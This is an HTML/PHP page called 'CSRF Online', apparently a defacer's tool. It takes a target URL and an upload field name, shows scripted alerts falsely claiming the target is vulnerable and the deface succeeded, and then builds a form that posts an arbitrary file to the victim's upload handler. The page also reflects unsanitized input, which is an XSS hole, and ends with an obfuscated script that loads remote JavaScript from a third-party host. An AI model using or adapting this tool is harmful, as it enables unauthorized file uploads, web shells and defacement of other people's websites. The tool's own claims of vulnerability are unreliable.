CSRF Online

1. <html>
2. <head>
3. <iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/302993013&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></iframe>
4. <title>CSRF Online</title>
5. <link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
6. <link href="https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300" rel="stylesheet" type="text/css">
7. <link href="http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700" rel="stylesheet" type="text/css">
8. <meta content='CSRF Online' name='title'/>
9. <meta content='CSRF Online' name='description'/>
10. <meta content='CSRF Online' name='keywords'/>
11. <meta content='CSRF Online' name='Abstract'/>
12. <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
13. <link rel="icon" type="image/png" href="https://cdn.pixabay.com/photo/2013/07/13/13/41/bash-161382_960_720.png">
14. <br>
15. <br>
16. <br>
17. <body style="background-color: rgb(0, 0, 0); color: rgb(0, 0, 0);"alink="#ee0000" link="#0000ee" vlink="#551a8b">
18. <span style="color: rgb(242, 239, 239);">
19. <br>
20. <span style="font-family: monospace;"></head>
21. <center>
22. <div class="error">
23. <img border="0" src="https://1.bp.blogspot.com/-Um9UjXjVTEg/WQUeHug4BvI/AAAAAAAAMYE/Rkq54qpv0bc1oNYUuJwtdGtKnxXio1dKwCEw/s320/logo%20dream%20league%20soccer%20one%20piece%20ace.png" width="250" height="">
24. <br>
25. <font size="4" face="Terminal">
26. <br> </br>
27. <font size="4" face="Terminal">
28.  
29. </font></p>
30. <font size="7" face="Open Sans Condensed">&#1203;&#824;&#1202;&#824;&#1203; CSRF Online &#1203;&#824;&#1202;&#824;&#1203;</font>
31. </p>
32. <font size="4" face="Ubuntu Mono"></font></p>
33. <font size="4" face="Ubuntu Mono">#CSRF Online#</font></p>
34. <font size="4" face="Ubuntu Mono">Hopefully Your Target Vuln</font></p>
35. <br>
36. <div style="display">
37. <center>
38. <form method="post">
39. <font face="Inconsolata" color="white"> URL Target : </font> <font color="red"> &#1203;&#824;&#1202;&#824;&#1203; </font> <input type="text" name="url" placeholder="Your Target" style="margin: 5px auto; padding-left: 5px;" required>
40. <br><br><font face="Inconsolata" color="white"> Post File : </font> <font color="red">&#1203;&#824;&#1202;&#824;&#1203; </font><font color="black">-</font> <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" required>
41. <br><br><input type = "submit" name = "submit" value = "Target Key" class="login-input"style='width: 130px; height: 40px;'> </ form >
42. </form>
43. <?php
44. $url = $_POST['url'];
45. $pf = $_POST['pf'];
46. $d = $_POST['submit'];
47. if($d) {
48. echo "<SCRIPT language='JavaScript'>alert('URL Target Is Vuln');</SCRIPT>";
49. echo "<SCRIPT language='JavaScript'>alert('Upload Your File');</SCRIPT>";
50. echo "<SCRIPT language='JavaScript'>alert(' Status : Terkunci');</SCRIPT>";
51. echo "<SCRIPT language='JavaScript'>alert('Akses Your File');</SCRIPT>";
52. echo "<SCRIPT language='JavaScript'>alert('Edit Page Index Done');</SCRIPT>";
53. echo "<SCRIPT language='JavaScript'>alert('Miror -> Ok');</SCRIPT>";
54. echo "<SCRIPT language='JavaScript'>alert('Happy Deface';</SCRIPT>";
55. echo " <div id='preloader'> ";
56. echo " <div id='loading'> ";
57. echo " </div> </div> ";
58. echo " <div class='content'> ";
59. echo " </div> ";
60. echo "<img src='https://4.bp.blogspot.com/-Q9KIU7LpNSM/WQUeCRx_blI/AAAAAAAAMYE/U2fFeHb33t0f_CnxOffat_vH3WFVUk6kACEw/s320/logo%2Bdream%2Bleague%2Bsoccer%2Banime%2Bzorro.png' style='width: 120px; height: 80px';>";
61. echo "<br>";
62. echo " <font face='Inconsolata' color='red'> $url Status -> </font> <font face='Inconsolata' color='green'> Locked </font> ";
63. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><font face='Inconsolata' color='white'> Filename : </font><font color=black>&#1203;&#824;&#1202;&#824;&#1203;</font><input type='file' name='$pf'><input type='submit' name='submit' value=' Fire!!!' class='login-input' style='width: 120px; height: 42px;'></form";
64. }
65. ?>
66. </form>
67. <script src="http://code.jquery.com/jquery-2.1.1.min.js"></script>
68. <script type="text/javascript">
69. $(window).load(function() {
70. $("#content").fadeOut();
71. $("#preloader").delay(10).fadeOut("slow");
72. })
73. </script>
74. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m1yEw0Zhss6dvuHT13xMZiBN37rSBhkrd%2fCI6B%2fO93ucRMvQCK4bk0WK%2bjVW9CZiim%2buqGrq0rZWmRqTaXCl13wBkXBaFmn5VyZYrEN%2brCEiUUv6PpHM%2fO5GRaJa2GVhiytVD8xjnt2oLcufZ12xvW1ulina2Rp%2fKFtFfU2SOAaIpMUNhsEmcAANAx2xbX0gOAEQ39FTx4l%2b0avPk9KlsWYDybRimp4YVR4x8vs8IvKwzsnHbA4dlWic8yZqScxxsiZE7U7iKfHuK%2fLHrPzq16ygpWj2dgoty%2fPbhMCbBJ%2bSGQdnm41dFpHbMOGKCs1X4kALbvo7%2ftcjaSsFbm0rhPdmmhoNlTYzqlUzBbkmagEbYz7suV%2buW3HhiNKdlobKcd7TUXRwV2tuumevdkz6ByjBcGh%2fc%2brHEE%2fvTuIcIk0NZbLPmDVwqbIWaWC7eeWDiuPN7cuMK%2fUHyQtdhDdTFbdyu7aa7XDtY7P3ptscirhAEN7wf3287hvdZJzqCj1clRB1X1N9EaytwJv3rBiqZJESyMLFie3VfNGJGpwGfypQCe%2bX4jNF5KYKZNxbbqFAK8rjFbeqRT%2fdTawUgcFBBww%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
75. </html>